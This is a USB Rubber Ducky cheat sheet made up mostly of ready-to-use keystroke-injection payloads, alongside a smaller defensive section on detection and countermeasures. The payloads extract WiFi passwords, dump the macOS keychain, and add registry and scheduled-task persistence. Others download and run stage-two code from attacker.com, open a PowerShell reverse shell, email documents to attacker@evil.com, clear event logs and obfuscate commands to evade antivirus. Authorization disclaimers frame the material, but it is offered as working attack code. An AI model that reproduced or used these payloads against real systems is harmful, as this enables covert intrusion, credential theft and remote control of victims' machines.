# USB Rubber Ducky Keystroke Injection Tool Cheat Sheet

## Overview

The USB Rubber Ducky is a keystroke injection tool disguised as a generic flash drive. Created by Hak5, it appears to the target computer as a keyboard and can execute pre-programmed keystrokes at superhuman speeds. It is commonly used for penetration testing, social engineering assessments, and security demonstrations.

Warning: This tool is intended only for authorized penetration testing and security assessments. Make sure you have proper authorization before using it in any environment.

## Hardware Overview

### USB Rubber Ducky Specifications

  • Processor: 60 MHz 32-bit processor
  • Storage: MicroSD card (up to 32GB)
  • Interface: USB 2.0
  • Speed: 1000 words per minute injection rate
  • Compatibility: Windows, Mac, Linux, Android
  • Power: Bus-powered via USB

### Required Components

  • USB Rubber Ducky device
  • MicroSD card (formatted as FAT or FAT32)
  • Computer with internet access for payload development
  • Target computer with USB port

## Setup and Configuration

### Initial Setup
```bash
# Format MicroSD card
# Windows: Use Disk Management or format command
format F: /FS:FAT32 /Q

# Linux: Use fdisk and mkfs
sudo fdisk /dev/sdX
sudo mkfs.fat -F32 /dev/sdX1

# macOS: Use Disk Utility or diskutil
diskutil eraseDisk FAT32 DUCKY /dev/diskX
```

### Firmware Updates
```bash
# Download latest firmware from Hak5
# Flash firmware using DFU mode
# Hold button while plugging in to enter DFU mode

# Linux firmware flashing
sudo dfu-util -D firmware.bin

# Windows firmware flashing (use Hak5 Flash tool)
# Follow Hak5 documentation for firmware updates
```

### File Structure
```
MicroSD Card Structure:
├── inject.bin (compiled payload)
├── config.txt (optional configuration)
└── payloads/ (source payload files)
```

## DuckyScript Language

### Basic Syntax
```bash
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
```

### Core Commands
| Command | Description | Example |
| --- | --- | --- |
| `REM` | Comment line | `REM This is a comment` |
| `DELAY` | Pause execution (ms) | `DELAY 1000` |
| `STRING` | Type text string | `STRING Hello World` |
| `ENTER` | Press Enter key | `ENTER` |
| `TAB` | Press Tab key | `TAB` |
| `ESCAPE` | Press Escape key | `ESCAPE` |
| `SPACE` | Press Space key | `SPACE` |
| `REPEAT` | Repeat last command | `REPEAT 5` |

### Modifier Keys
| Command | Description |
| --- | --- |
| `CTRL` or `CONTROL` | Control key |
| `ALT` | Alt key |
| `SHIFT` | Shift key |
| `GUI` or `WINDOWS` | Windows/Cmd key |
| `MENU` or `APP` | Menu/Application key |

### Key Combinations
```bash
REM Ctrl+C (Copy)
CTRL c

REM Ctrl+Alt+Delete
CTRL ALT DELETE

REM Windows+R (Run dialog)
GUI r

REM Alt+Tab (Switch windows)
ALT TAB

REM Ctrl+Shift+Esc (Task Manager)
CTRL SHIFT ESCAPE
```
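
For triage of a recovered device, the source script can be summarized without running it. The parser below is an added example, not Hak5 code: it covers only the commands in the tables above, expands `REPEAT`, and flags strings that recur in this page's payloads and detections. The names `triage`, `KEYS` and `INDICATORS` and the sample input are constructed for illustration.

```python
import re

# Keys and modifiers listed in the command tables above.
KEYS = {"ENTER", "TAB", "ESCAPE", "SPACE", "CTRL", "CONTROL", "ALT",
        "SHIFT", "GUI", "WINDOWS", "MENU", "APP"}
# Strings that recur in the payloads and detections on this page.
INDICATORS = ["DownloadString", "IEX", "-EncodedCommand", "-WindowStyle Hidden",
              "schtasks /create", "CurrentVersion\\Run"]

def _apply(line, report):
    cmd, _, arg = line.partition(" ")
    cmd = cmd.upper()
    if cmd == "DELAY" and arg.strip().isdigit():
        report["delay_ms"] += int(arg)
    elif cmd == "STRING":
        report["typed"].append(arg)
    elif cmd in KEYS:
        report["keys"].append(line)
    else:
        report["unknown"].append(line)  # not in the tables: review by hand

def triage(script):
    """Summarize what a recovered DuckyScript source file would type."""
    report = {"delay_ms": 0, "typed": [], "keys": [], "unknown": []}
    last = None  # previous executable line, replayed by REPEAT
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.split()[0].upper() == "REM":
            continue
        cmd, _, arg = line.partition(" ")
        if cmd.upper() == "REPEAT":
            count = int(arg) if arg.strip().isdigit() else 0
            for _ in range(count if last else 0):
                _apply(last, report)
            continue
        _apply(line, report)
        last = line
    text = "\n".join(report["typed"])
    # Match indicators as whole tokens so "IEX" does not fire inside other words.
    report["hits"] = [i for i in INDICATORS if re.search(
        r"(?<![\w-])" + re.escape(i) + r"(?!\w)", text, re.I)]
    return report

# Constructed sample, not a payload from this page.
SAMPLE = ("REM constructed sample\nDELAY 2000\nGUI r\nDELAY 500\n"
          "STRING powershell -WindowStyle Hidden\nENTER\n"
          "STRING echo test\nREPEAT 2\nFOO bar")

if __name__ == "__main__":
    print(triage(SAMPLE))
```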

## Payload Development

### Basic Payload Structure
```bash
REM Author: Security Tester
REM Description: Basic Windows enumeration
REM Target: Windows 10/11

DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING whoami && hostname && ipconfig
ENTER
DELAY 2000
STRING exit
ENTER
```

### Windows Payloads

#### System Information Gathering
```bash
REM Windows System Information
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-ComputerInfo|Out-File C:\temp\sysinfo.txt
ENTER
DELAY 2000
STRING Get-Process|Out-File C:\temp\processes.txt -Append
ENTER
DELAY 2000
STRING Get-Service|Out-File C:\temp\services.txt -Append
ENTER
DELAY 2000
STRING exit
ENTER
```

#### Network Reconnaissance
```bash
REM Network Information Gathering
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING ipconfig /all > C:\temp\network.txt
ENTER
DELAY 1000
STRING netstat -an >> C:\temp\network.txt
ENTER
DELAY 1000
STRING arp -a >> C:\temp\network.txt
ENTER
DELAY 1000
STRING route print >> C:\temp\network.txt
ENTER
DELAY 1000
STRING exit
ENTER
```

#### Credential Harvesting
```bash
REM WiFi Password Extraction
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING netsh wlan show profiles
ENTER
DELAY 2000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
ENTER
DELAY 5000
STRING exit
ENTER
```

#### Persistence Mechanisms
```bash
REM Registry Persistence
DELAY 2000
GUI r
DELAY 500
STRING regedit
ENTER
DELAY 2000
CTRL f
DELAY 500
STRING HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ENTER
DELAY 1000
ALT F4
DELAY 500
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\calc.exe"
ENTER
DELAY 1000
STRING exit
ENTER
```

### macOS Payloads

#### System Information
```bash
REM macOS System Information
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING system_profiler SPHardwareDataType > ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING ps aux >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING netstat -an >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING exit
ENTER
```

#### Keychain Access
```bash
REM macOS Keychain Dump
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING security dump-keychain -d login.keychain > ~/Desktop/keychain.txt 2>&1
ENTER
DELAY 5000
STRING exit
ENTER
```

### Linux Payloads

#### System Enumeration
```bash
REM Linux System Enumeration
DELAY 2000
CTRL ALT t
DELAY 1000
STRING uname -a > /tmp/sysinfo.txt
ENTER
DELAY 500
STRING cat /etc/passwd >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING ps aux >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING netstat -tulpn >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING exit
ENTER
```

#### Privilege Escalation Check
```bash
REM Linux Privilege Escalation Check
DELAY 2000
CTRL ALT t
DELAY 1000
STRING sudo -l > /tmp/privesc.txt
ENTER
DELAY 1000
STRING find / -perm -4000 2>/dev/null >> /tmp/privesc.txt
ENTER
DELAY 2000
STRING crontab -l >> /tmp/privesc.txt
ENTER
DELAY 1000
STRING exit
ENTER
```

## Advanced Payloads

### Multi-Stage Payloads
```bash
REM Multi-stage payload with download
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/stage2.ps1')
ENTER
DELAY 5000
STRING exit
ENTER
```

### Reverse Shell Payload
```bash
REM PowerShell Reverse Shell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535 | %{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
ENTER
```

### Data Exfiltration
```bash
REM Data Exfiltration via Email
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $files = Get-ChildItem C:\Users\$env:USERNAME\Documents -Recurse -Include *.txt,*.doc,*.pdf|Select-Object -First 10
ENTER
DELAY 1000
STRING foreach($file in $files) { $content = Get-Content $file.FullName -Raw; Send-MailMessage -To "attacker@evil.com" -From "victim@company.com" -Subject $file.Name -Body $content -SmtpServer "smtp.company.com" }
ENTER
DELAY 5000
STRING exit
ENTER
```

### Anti-Forensics
```bash
REM Clear Event Logs
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-EventLog -List|ForEach-Object { Clear-EventLog $_.Log }
ENTER
DELAY 2000
STRING Remove-Item $env:TEMP\* -Recurse -Force
ENTER
DELAY 2000
STRING exit
ENTER
```

## Payload Compilation

### DuckEncoder
```bash
# Download DuckEncoder
git clone https://github.com/hak5darren/USB-Rubber-Ducky.git
cd USB-Rubber-Ducky

# Compile payload
java -jar Encoder/encoder.jar -i payload.txt -o inject.bin

# Alternative online encoder
# Visit: https://ducktoolkit.com/encoder
```

### Duck Toolkit
```bash
# Online compilation at ducktoolkit.com
# 1. Paste DuckyScript code
# 2. Select keyboard layout
# 3. Click "Encode Payload"
# 4. Download inject.bin file
```

### Keyboard Layouts
```bash
# Common keyboard layouts
us          # US English
uk          # UK English
de          # German
fr          # French
es          # Spanish
it          # Italian
pt          # Portuguese
ru          # Russian
```

## Deployment Strategies

### Physical Access Scenarios
```bash
REM Quick deployment (30 seconds)
DELAY 2000
GUI r
DELAY 500
STRING cmd /c "powershell IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/payload')"
ENTER
```

### Social Engineering Integration
```bash
REM Disguised as software update
DELAY 3000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Dear User,
ENTER
STRING
ENTER
STRING A critical security update is being installed.
ENTER
STRING Please do not remove this device until complete.
ENTER
STRING
ENTER
STRING Estimated time: 2-3 minutes
ENTER
DELAY 2000
ALT F4
DELAY 500
REM Execute actual payload here
```

### Persistence Payloads
```bash
REM Scheduled Task Persistence
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING schtasks /create /tn "SecurityUpdate" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\update.ps1" /sc daily /st 09:00
ENTER
DELAY 1000
STRING exit
ENTER
```

## Evasion Techniques

### Anti-Virus Evasion
```bash
REM Obfuscated PowerShell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -EncodedCommand <base64_encoded_command>
ENTER
```

### Timing-Based Evasion
```bash
REM Random delays to avoid detection
DELAY 3000
GUI r
DELAY 800
STRING cmd
ENTER
DELAY 1200
STRING echo "Normal user activity"
ENTER
DELAY 2500
REM Execute payload with human-like timing
```

### Process Hiding
```bash
REM Hide PowerShell window
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -NoProfile -NonInteractive
ENTER
DELAY 1000
STRING Start-Process powershell -ArgumentList "-WindowStyle Hidden -Command 'Your-Command-Here'" -WindowStyle Hidden
ENTER
```

## Defensive Measures and Detection

### USB Device Monitoring
```powershell
# Monitor USB device insertions
Get-WinEvent -FilterHashtable @{LogName='System'; ID=20001,20003} |
    Where-Object { $_.Message -like "*USB*" }

# Registry monitoring for USB devices
# Note: USBSTOR lists mass-storage devices only; a device that presents
# only as a HID keyboard does not appear under this key
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\*" |
    Select-Object FriendlyName, Mfg, Service
```

### Keystroke Injection Detection
```powershell
# Monitor for rapid keystroke patterns
# Look for superhuman typing speeds in logs
# Note: 4648 and 4624 are logon events; they show recent logon activity
# (last 5 minutes) to correlate with a device insertion, not keystroke timing
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4648,4624} |
    Where-Object { $_.TimeCreated -gt (Get-Date).AddMinutes(-5) }

# Monitor for suspicious command patterns
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} |
    Where-Object { $_.Message -like "*DownloadString*" -or $_.Message -like "*IEX*" }
```
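
The "superhuman typing speed" signal can be made concrete when per-keystroke timestamps are available. The following is an added example, not part of the original cheat sheet. It assumes an endpoint agent supplies keystroke timestamps in milliseconds, since Windows event logs do not record them. The function names and both thresholds are assumptions to tune per environment.

```python
from statistics import median

HUMAN_MIN_INTERVAL_MS = 30  # assumption: sustained human typing has larger gaps
MIN_BURST_KEYS = 20         # assumption: shorter runs are ignored as key rollover

def find_injection_bursts(timestamps_ms, max_gap=HUMAN_MIN_INTERVAL_MS,
                          min_keys=MIN_BURST_KEYS):
    """Return (start_ms, end_ms, key_count, median_gap_ms) for every run of
    keystrokes in which each gap to the previous key is below max_gap."""
    bursts, start = [], 0
    for i in range(1, len(timestamps_ms) + 1):
        run_ended = (i == len(timestamps_ms)
                     or timestamps_ms[i] - timestamps_ms[i - 1] >= max_gap)
        if run_ended:
            run = timestamps_ms[start:i]
            if len(run) >= min_keys:
                gaps = [b - a for a, b in zip(run, run[1:])]
                bursts.append((run[0], run[-1], len(run), median(gaps)))
            start = i
    return bursts

def words_per_minute(key_count, duration_ms):
    """Typing rate of a burst, using the usual 5 characters per word."""
    if duration_ms <= 0:
        return float("inf")
    return (key_count / 5) / (duration_ms / 60000)

# Constructed sample: 15 human keystrokes (180 ms apart), a 40-key burst at
# 12 ms spacing, then 10 more human keystrokes (200 ms apart).
SAMPLE = ([i * 180 for i in range(15)]
          + [5000 + i * 12 for i in range(40)]
          + [7000 + i * 200 for i in range(10)])

if __name__ == "__main__":
    for start, end, keys, gap in find_injection_bursts(SAMPLE):
        rate = words_per_minute(keys, end - start)
        print(f"burst {start}-{end} ms: {keys} keys, median gap {gap} ms, ~{rate:.0f} WPM")
```

On the constructed sample the 40-key burst works out to roughly 1000 words per minute, the injection rate listed in the specifications above.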

### USB Port Restrictions
```cmd
REM Disable USB storage devices via Group Policy
REM Computer Configuration > Administrative Templates > System > Removable Storage Access

REM Registry method to disable USB storage
REM Note: this blocks USB mass storage only; HID keyboard devices are not affected
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f
```

## Countermeasures

### Endpoint Protection
```powershell
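# Enable PowerShell script block logging (create the policy key if it is missing)
$sbl = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
if (-not (Test-Path $sbl)) { New-Item -Path $sbl -Force | Out-Null }
Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1

# Enable command line auditing
auditpol /set /subcategory:"Process Creation" /success:enable
# Include the command line in process creation events (4688)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f

# Monitor for suspicious processes
Get-Process | Where-Object { $_.ProcessName -like "*powershell*" -and $_.MainWindowTitle -eq "" }
```

### Network Monitoring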
```bash
# Monitor for suspicious network connections
netstat -an | grep ESTABLISHED | grep -E "(4444|8080|443)"

# DNS monitoring for suspicious domains
# Monitor DNS logs for newly registered domains or suspicious TLDs
```

### User Training

Key indicators of USB Rubber Ducky attacks:

1. Unexpected keyboard activity
2. Rapid text entry beyond human capability
3. Command prompts appearing automatically
4. Suspicious network activity after USB insertion
5. New scheduled tasks or startup programs

## Advanced Techniques

### Payload Chaining
```bash
REM Stage 1: Initial access
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Invoke-WebRequest -Uri "http://attacker.com/stage2.txt" -OutFile "$env:TEMP\s2.txt"
ENTER
DELAY 3000
STRING Get-Content "$env:TEMP\s2.txt"|Invoke-Expression
ENTER
DELAY 1000
STRING exit
ENTER
```

### Environment Detection
```bash
REM Detect virtualized environment
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ((Get-WmiObject -Class Win32_ComputerSystem).Model -notlike "*Virtual*") { Your-Payload-Here }
ENTER
DELAY 2000
STRING exit
ENTER
```

### Conditional Execution
```bash
REM Execute only on specific OS version
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ([Environment]::OSVersion.Version.Major -eq 10) { Your-Windows10-Payload }
ENTER
DELAY 2000
STRING exit
ENTER
```

## Troubleshooting

### Common Issues
```
Issue: Payload not executing
Solution: Check keyboard layout, verify inject.bin file

Issue: Commands typing incorrectly
Solution: Verify keyboard layout matches target system

Issue: Timing issues
Solution: Increase DELAY values for slower systems

Issue: Antivirus detection
Solution: Use obfuscation techniques, test on similar AV
```

### Debugging Payloads
```bash
REM Debug payload with visible output
DELAY 2000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Payload executed successfully
ENTER
STRING Current user:
STRING %USERNAME%
ENTER
STRING Current time:
STRING %TIME%
ENTER
```

### Test Environment
```bash
# Set up isolated testing environment
# Use virtual machines for payload development
# Test on multiple OS versions and configurations
# Verify payload behavior before deployment
```

## Legal and Ethical Considerations

### Authorized Use Only

  • Obtain written authorization before testing
  • Only use in controlled environments
  • All testing activities
  • Responsible disclosure practices

### Compliance Requirements

  • Ensure compliance with local laws
  • Follow organizational security policies
  • Maintain chain of custody for evidence
  • Protect sensitive information discovered

---

*This cheat sheet provides a comprehensive reference for using the USB Rubber Ducky. Always make sure you have proper authorization before conducting physical security assessments.*